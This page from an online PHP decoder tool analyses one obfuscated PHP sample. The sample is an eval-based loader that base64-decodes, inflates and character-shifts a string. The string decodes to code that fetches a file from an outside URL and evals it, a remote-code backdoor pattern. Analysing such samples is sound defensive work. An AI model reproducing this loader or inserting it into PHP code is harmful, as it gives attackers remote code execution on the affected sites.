Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function DdmP($qaBVUo) { $qaBVUo=gzinflate(base64_decode($qaBVUo)); for($i=0;$i..

Decoded Output download

<?php function DdmP($qaBVUo) 
{  
$qaBVUo=gzinflate(base64_decode($qaBVUo)); 
 for($i=0;$i<strlen($qaBVUo);$i++) 
 { 
$qaBVUo[$i] = chr(ord($qaBVUo[$i])-1); 
 } 
 return $qaBVUo; 
 }eval(DdmP("DcIxDoUgEAXAA3gKYwWF0KiF/zAE4alEP0vYDfH2Opm+/3Ro/labZyyTiwgUofZ0wx0QFygLsrAaTpHCq7W+JMPp/02mZbv7gI3osozaUEeJXCrNRh4ZtNa/Fw=="));?>

Did this file decode correctly?

Original Code

<?php function DdmP($qaBVUo)
{ 
$qaBVUo=gzinflate(base64_decode($qaBVUo));
 for($i=0;$i<strlen($qaBVUo);$i++)
 {
$qaBVUo[$i] = chr(ord($qaBVUo[$i])-1);
 }
 return $qaBVUo;
 }eval(DdmP("DcIxDoUgEAXAA3gKYwWF0KiF/zAE4alEP0vYDfH2Opm+/3Ro/labZyyTiwgUofZ0wx0QFygLsrAaTpHCq7W+JMPp/02mZbv7gI3osozaUEeJXCrNRh4ZtNa/Fw=="));?>

Function Calls

chr 99
ord 99
DdmP 1
strlen 100
gzinflate 1
base64_decode 1

Variables

$i 99
$qaBVUo !!!!! fwbm)cbtf75`efdpef)gjmf`hfu`dpoufout)#iuuqt;00bqj/tjnt..

Stats

MD5 705147733683a09c1bfa936873266afe
Eval Count 1
Decode Time 317 ms